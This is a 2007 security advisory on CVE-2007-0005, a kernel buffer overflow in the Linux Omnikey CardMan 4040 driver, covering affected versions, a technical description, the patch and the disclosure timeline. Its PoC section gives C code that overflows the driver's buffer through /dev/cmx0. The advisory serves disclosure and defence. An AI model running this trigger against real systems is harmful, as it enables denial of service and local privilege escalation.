csa-driver.txt

`#############################################################  
#  
# COMPASS SECURITY ADVISORY http://www.csnc.ch/  
#  
#############################################################  
#  
# Product: Linux Driver for Omnikey CardMan 4040  
# Vendor: Omnikey GmbH / Harald Welte  
# Subject: Buffer Overflow  
# Risk: Medium  
# Effect: Locally exploitable  
# Author: Daniel Roethlisberger ([email protected])  
# Date: 2007-03-07  
# CVE Name: CVE-2007-0005  
#  
#############################################################  
  
  
Introduction:  
-------------  
The Linux drivers for the Omnikey CardMan 4040 smartcard reader contain  
a buffer overflow vulnerability. Local attackers with direct or  
indirect write permissions to a cmx device file can execute arbitrary  
code with kernel privileges or may cause denial of service.  
  
  
Vulnerable:  
-----------  
* Linux 2.4/2.6 cm4040 drivers by Omnikey:  
- cm4040 v1.1.0  
- cm4040 v1.2.0  
- cm4040 v2.0.0  
* Linux 2.6 cm4040 drivers by Harald Welte, as included in:  
- Linux 2.6.15 ... 2.6.20.1  
  
Not vulnerable:  
---------------  
* Linux 2.4/2.6 cm4040 drivers by Omnikey:  
- cm4040 v1.0.0  
* FreeBSD cmx driver by Daniel Roethlisberger  
  
Not tested:  
-----------  
* Other Linux driver versions  
* Drivers for MacOS X, Windows  
  
  
Technical Description:  
----------------------  
While using the Linux drivers for the CM4040 as a reference for writing  
a cmx FreeBSD driver, Compass Security has discovered two buffer  
overflows in the Linux drivers. One of them in the write() and another  
one in the read() handler.  
  
When calling write() with a buffer larger than 512 bytes, the driver's  
write buffer overflows, allowing to overwrite the EIP and execute  
arbitrary code with kernel privileges.  
  
In the read() handler, there is a similar problem with data originating  
in the device. A malicious or buggy device sending more than 512 bytes  
can overflow the driver's read buffer to the same effect.  
  
Of course, the write() vulnerability is only exploitable by users with  
direct or indirect write access to the cmx device special file. By  
default, direct access is limited to root. Therefore, one might think  
this is not an issue. However, unprivileged users may cause large  
indirect writes via userland daemons such as those provided by pcsc-lite  
or openct. Since "normal" APDUs are smaller than 512 bytes, this may  
not be an issue, but I haven't looked into the various ways to cause  
data to be written indirectly.  
  
Furthermore, a system can be set up to allow access to the device for a  
special user or group in order to increase security by running the  
userland drivers without root privileges. In such a setup users with  
access to the device can escalate privileges or cause DoS.  
  
  
PoC Code:  
---------  
/*  
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)  
* Copyright (C) Daniel Roethlisberger <[email protected]>  
* Compass Security Network Computing AG, Rapperswil, Switzerland.  
* All rights reserved.  
* http://www.csnc.ch/  
*/  
  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<stdlib.h>  
#include<stdio.h>  
#include<string.h>  
#include<errno.h>  
  
int main(int argc, char *argv[]) {  
int fd, i, n;  
char buf[8192];  
  
/*  
* 0 1 2 3 4 5 6 7 8 9 a b c d e f ...  
* 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...  
*/  
for (i = 0; i < sizeof(buf); i += 2) {  
buf[i] = (char)(((i/2) & 0xFF00) >> 8);  
buf[i+1] = (char) ((i/2) & 0x00FF);  
}  
  
if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {  
printf("Error: open() => %s\n", strerror(errno));  
exit(errno);  
}  
if ((n = write(fd, buf, sizeof(buf))) < 0) {  
printf("Error: write() => %s\n", strerror(errno));  
exit(errno);  
}  
printf("%d of %d bytes written\n", n, sizeof(buf));  
exit(0);  
}  
  
  
Workaround:  
-----------  
Patch available: http://lkml.org/lkml/2007/3/6/386  
  
  
Timeline:  
---------  
Vendor Status: Linux 2.6.21-rc3 contains the patch.  
Omnikey will fix it in their next driver release.  
Vendor Notified: 2007-02-05 (Harald Welte)  
2007-02-06 (vendor-sec, Omnikey)  
Vendor Response: Will fix (Harald Welte, vendor-sec)  
Will fix but not coordinate release schedule (Omnikey)  
Embargo Until: 2007-03-06  
  
  
--   
Daniel Roethlisberger, Compass Security Network Computing AG  
Glaernischstrasse 7, CH-8640 Rapperswil, Switzerland  
  
Tel +41 55 214 41 77  
Fax +41 55 214 41 61  
[email protected]  
http://www.csnc.ch/  
  
PGP: D927 96F6 7266 1683 06CF F984 ACEC DBB0 6929 2CBA  
Security Review - Penetration Testing - Computer Forensics  
`